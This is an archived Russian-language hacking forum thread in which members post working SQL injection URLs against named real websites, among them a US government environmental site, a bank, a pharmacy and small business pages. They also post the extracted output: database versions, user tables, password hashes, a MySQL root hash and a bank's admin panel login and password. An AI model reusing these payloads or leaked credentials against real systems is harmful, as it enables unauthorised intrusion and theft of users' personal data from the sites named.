Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
01.11.2007, 10:58
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695
Репутация:
524
|
|
kaosweaver.com
Код:
http://www.kaosweaver.com/ExtensionsHelp/kaoshelp.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4/*
5.0.27-standard:kaosweav_kwmaster:kaosweav_kuserdb@localh ost
76 таблиц:
Код:
http://www.kaosweaver.com/ExtensionsHelp/kaoshelp.php?id=-1+union+select+table_name,2,3,4+from+information_schema.tables+limit+75,1/*
Из интересных таблиц - bbs_users и tblMembers.
В bbs_users есть поля: username, password, email, url, jabber, realname, icq, msn, aim, yahoo.
А в tblMembers есть поля m_firstName, m_lastName, m_password, m_email, m_phone ну и адрес,
факс и прочая херь...
Код:
http://www.kaosweaver.com/ExtensionsHelp/kaoshelp.php?id=-1+union+select+concat_ws(0x3a,m_firstName,m_lastName,m_password,m_email,m_phone),2,3,4+from+tblMembers+limit+0,1/*
|
|
|
01.11.2007, 14:10
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
SQL-inj в miniBB<=2.1
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «table» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения
Поиск в Гугл: "forum script miniBB"
Пример: _www.icealeko.ru/forums
Код:
_http://www.icealeko.ru/forums/index.php?action=search&where=3&searchGo=1&table=minibbtable_posts/**/LIMIT/**/0/**/UNION/**/SELECT/**/hex(concat(username,0x20,user_password))/**/FROM/**/minibbtable_users/**/WHERE/**/user_id=1/*
Получаем вывод в HEX (без кодирования, а так же с AES_DECRYPT(AES_ENCRYPT()) вывода нет):
Код:
7A6176676172203530373434336430323063666261353833636166306631636539653536323163
Конвертируем HEX->ASCII - получаем логин и хэш
Код:
zavgar 507443d020cfba583caf0f1ce9e5621c
|
|
|
|
01.11.2007, 14:31
|
|
Познающий
Регистрация: 26.11.2006
Сообщений: 49
Провел на форуме:
65459
Репутация:
79
|
|
Код HTML:
http://www.cyclingnorthumbria.co.uk/pages/newscontent.php?ID=-5%20UNION%20SELECT%201,username,user_password,user_icq+FROM+forum_users/*
|
|
|
|
01.11.2007, 15:38
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://www.continental-tc.ru/news.php?nid=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,version( ),database(),user()),8/*
4.0.27-max-log/cont86_cont/cont86_cont@v8.valuehost.ru
-----------------------------------------------------------------------
http://www.baykalclub.ru/news/news.php?id=-1'+union+select+1,concat_ws(0x2F,version(),databas e(),user()),3,4,5/*
4.0.26-log/udb3829/Uwww3829S@localhost
|
|
|
|
01.11.2007, 15:49
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695
Репутация:
524
|
|
hpol.org
Код:
http://www.hpol.org/transcript.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5/*
5.0.27:hpol:ro@localhost
29 таблиц:
Код:
http://www.hpol.org/transcript.php?id=-1+union+select+1,table_name,3,4,5+from+information_schema.tables+limit+28,1/*
Интересных таблиц нет...
|
|
|
|
01.11.2007, 16:09
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343
Репутация:
141
|
|
PUGET SOUND-GEORGIA BASIN ENVIRONMENTAL INITIATIVE
http://www.psat.wa. gov/
Код:
http://www.psat.wa.gov/Publications/news_stories/hoodcanal_news_story.php?id=-1+union+select+1,2,3,4,concat(aes_decrypt(aes_encrypt(user,0x71),0x71),0x3a,aes_decrypt(aes_encrypt(password,0x71),0x71),0x71),6,7,8+from+mysql.user/*
4.1.8-standard
root:*00EF6E5ADDE837A950A846F51A37244509B849DBq
|
|
|
|
01.11.2007, 16:59
|
|
Участник форума
Регистрация: 05.10.2006
Сообщений: 133
Провел на форуме:
548338
Репутация:
165
|
|
Calista Luxury Resort
отель в анталии 
Код:
http://www.calista.com.tr/calistaweb/news_read.asp?id=99999
|
|
|
|
afilin@localhost:a_filin*5.0.27-log |
01.11.2007, 19:32
|
|
Новичок
Регистрация: 31.10.2007
Сообщений: 18
Провел на форуме:
165018
Репутация:
25
|
|
afilin@localhost:a_filin*5.0.27-log
http://apteka-filin.dp.ua/artcl.php?artcl&id=-1+union+select+1,concat(user(),0x3a,database(),0x2 a,version()),3,4,5,6/*
|
|
|
|
01.11.2007, 20:03
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
НацинвестпромБанк
http://www.nipbank.ru/News.asp?nid=32709+or+1=(SELECT+TOP+1+cast(logname +as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarc har)+from+users)--
Version: Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
Админка - http://www.nipbank.ru/admin/
Логин: admin
Пасс: nipb
Мой первый инъект в asp)
Последний раз редактировалось 0nep@t0p; 01.11.2007 в 20:06..
|
|
|
|
01.11.2007, 20:10
|
|
Новичок
Регистрация: 31.10.2007
Сообщений: 18
Провел на форуме:
165018
Репутация:
25
|
|
http://www.rosmed.ru/_link_catch.php?link_id=-1+UNION+SELECT+1,2,3,4/*
Идет редирект.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
